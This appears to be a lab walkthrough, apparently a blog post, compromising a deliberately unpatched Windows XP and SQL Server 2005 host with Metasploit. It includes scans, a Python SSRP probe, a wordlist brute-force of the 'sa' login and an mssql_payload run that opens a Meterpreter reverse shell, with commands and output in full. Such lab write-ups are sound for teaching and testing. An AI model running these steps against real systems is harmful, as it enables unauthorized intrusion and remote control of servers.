The target system comprises:
- Windows XP Pro Service Pack 2 (unpatched)
- Firewall and automatic updates switched off
- Microsoft Internet Information Services (IIS) web server and FTP service enabled
- SQL Server 2005 Express configured and listening
- A vulnerable web app up and running
Let's begin with an Nmap scan from within Metasploit (msfconsole's db_nmap, so the results land in the workspace database).
The pertinent results for this exploit are:
1433/tcp open ms-sql-s Microsoft SQL Server 2005 9.00.1399.00
Running: Microsoft Windows XP|2003
OS CPE: cpe:/o:microsoft:windows_xp cpe:/o:microsoft:windows_server_2003
OS details: Microsoft Windows XP SP2 or SP3, or Windows Server 2003
Interestingly, Nmap couldn't definitively identify which Windows service pack, but of course I know it's Service Pack 2.
By default a SQL Server instance listens on TCP port 1433 and the SQL Server Browser service, which tells clients where each instance lives, listens on UDP port 1434. So the next step is to check UDP 1434:
nmap -sU 192.168.1.79 -p1434
PORT STATE SERVICE
1434/udp open|filtered ms-sql-m
The scan is consistent with a Browser service being present, but open|filtered is all a plain UDP probe can say: nothing answered and no ICMP port-unreachable came back. The Metasploit mssql_ping module sends a real Browser request to UDP 1434, which both confirms the service and picks up more information:
msf > use scanner/mssql/mssql_ping
msf auxiliary(mssql_ping) > set RHOSTS 192.168.1.79
RHOSTS => 192.168.1.79
msf auxiliary(mssql_ping) > set THREADS 20
THREADS => 20
msf auxiliary(mssql_ping) > exploit
[*] SQL Server information for 192.168.1.79:
[+] ServerName = LAB
[+] InstanceName = SQLEXPRESS
[+] IsClustered = No
[+] Version = 9.00.1399.06
[+] tcp = 1433
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
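What mssql_ping does under the hood is a single datagram of the SQL Server Resolution Protocol (SSRP, documented by Microsoft as MS-SQLR): the client sends one byte, 0x02 (CLNT_UCAST_EX), to UDP 1434 and the Browser service replies with 0x05, a 16-bit little-endian length, and an ASCII string of key;value pairs, one instance per block terminated by ";;". The script below is an added example written for this page, not the page's own code and not a Metasploit module; it sends that request and parses the reply, and it ships with a constructed response (not a real capture) that mirrors the mssql_ping output above so the parser can be exercised offline. The host name on the command line and the helper names are mine.

```python
from __future__ import annotations

import socket
import struct
import sys

# SSRP (MS-SQLR) message types used here. The Browser service listens on UDP 1434.
CLNT_UCAST_EX = b"\x02"   # "list every instance on this host"
SVR_RESP = 0x05           # first byte of every server response


def build_svr_resp(body: bytes) -> bytes:
    """Wrap RESP_DATA in an SVR_RESP header (0x05 + 16-bit little-endian length).

    Only used here to construct an offline sample; a real server builds this itself.
    """
    return bytes([SVR_RESP]) + struct.pack("<H", len(body)) + body


def parse_ssrp_response(data: bytes) -> list[dict[str, str]]:
    """Parse one SVR_RESP datagram into a dict per advertised instance.

    RESP_DATA is ASCII 'key;value;key;value...' and each instance's block ends
    with ';;', so a host with several instances simply concatenates blocks.
    """
    if len(data) < 3 or data[0] != SVR_RESP:
        raise ValueError("not an SSRP SVR_RESP message")
    (size,) = struct.unpack_from("<H", data, 1)
    body = data[3:3 + size].decode("ascii", errors="replace")
    instances: list[dict[str, str]] = []
    for block in body.split(";;"):
        if not block:
            continue  # the trailing ';;' leaves an empty element behind
        fields = block.split(";")
        # pair up key;value;...; a dangling key with no value is dropped
        instances.append({fields[i]: fields[i + 1] for i in range(0, len(fields) - 1, 2)})
    return instances


def ssrp_ping(host: str, port: int = 1434, timeout: float = 3.0) -> list[dict[str, str]]:
    """Send CLNT_UCAST_EX to the Browser service and parse whatever comes back.

    Raises socket.timeout when the service is off or UDP 1434 is filtered; that
    silence is exactly why a bare Nmap UDP scan can only say open|filtered.
    """
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(CLNT_UCAST_EX, (host, port))
        data, _ = sock.recvfrom(65535)
    return parse_ssrp_response(data)


# Constructed sample (not a real capture): the RESP_DATA a Browser service would
# return for the LAB\SQLEXPRESS instance that mssql_ping reported on this page.
SAMPLE_RESP_DATA = (
    b"ServerName;LAB;InstanceName;SQLEXPRESS;IsClustered;No;"
    b"Version;9.00.1399.06;tcp;1433;;"
)
SAMPLE_DATAGRAM = build_svr_resp(SAMPLE_RESP_DATA)


def main(argv: list[str]) -> None:
    if len(argv) < 2:
        # no target given: run the parser over the constructed sample instead
        instances = parse_ssrp_response(SAMPLE_DATAGRAM)
    else:
        instances = ssrp_ping(argv[1])
    for inst in instances:
        # 'tcp' is absent when an instance only listens on named pipes, and a
        # named instance normally sits on a dynamic port, which is the whole
        # reason clients ask the Browser service in the first place
        print(f"{inst.get('ServerName')}\\{inst.get('InstanceName')} "
              f"version {inst.get('Version')} tcp={inst.get('tcp', 'not advertised')}")


if __name__ == "__main__":
    main(sys.argv)
```

Run it with no arguments to see the parser on the sample, or `python ssrp_ping.py 192.168.1.79` against the lab host. The parser is deliberately generic over keys, so fields the page does not show (for example `np` for a named-pipe endpoint) come through unchanged.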
That gives the server name, the instance name, the exact build and the TCP port the instance is listening on. Now, brute force the MS SQL login with mssql_login:
msf > use scanner/mssql/mssql_login
msf auxiliary(mssql_login) > set PASS_FILE /usr/share/set/src/fasttrack/wordlist.txt
PASS_FILE => /usr/share/set/src/fasttrack/wordlist.txt
msf auxiliary(mssql_login) > set RHOSTS 192.168.1.79
RHOSTS => 192.168.1.79
msf auxiliary(mssql_login) > set THREADS 10
THREADS => 10
msf auxiliary(mssql_login) > exploit
[+] 192.168.1.79:1433 - MSSQL - successful login 'sa' : 'password1'
The MS SQL login and password were guessed: sa, the built-in sysadmin account, with a password from a short wordlist. Now use mssql_payload. The module logs in with those credentials, re-enables the xp_cmdshell extended stored procedure if it is disabled (it is off by default on SQL Server 2005, but a sysadmin login can switch it back on through sp_configure), and then uses xp_cmdshell to write the payload to disk and execute it:
msf > use windows/mssql/mssql_payload
msf exploit(mssql_payload) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(mssql_payload) > set LHOST 192.168.1.70
LHOST => 192.168.1.70
msf exploit(mssql_payload) > set LPORT 443
LPORT => 443
msf exploit(mssql_payload) > set RHOST 192.168.1.79
RHOST => 192.168.1.79
msf exploit(mssql_payload) > set PASSWORD password1
PASSWORD => password1
msf exploit(mssql_payload) > exploit
[*] Started reverse handler on 192.168.1.70:443
[*] The server may have xp_cmdshell disabled, trying to enable it...
[*] Command Stager progress - 1.47% done (1499/102246 bytes)
[....]
[*] Sending stage (751104 bytes) to 192.168.1.79
[*] Command Stager progress - 100.00% done (102246/102246 bytes)
[*] Meterpreter session 1 opened (192.168.1.70:443 -> 192.168.1.79:1293) at 2013-06-13 10:39:46 +0100
meterpreter >
So, I'm inside the target machine with a Meterpreter shell. Note how short the chain was: the Browser service advertised the instance, the sa account had a guessable password, and that login was enough to turn xp_cmdshell back on and run commands in the context of the SQL Server service account. I hope this was helpful to you. Please post your comments and questions below.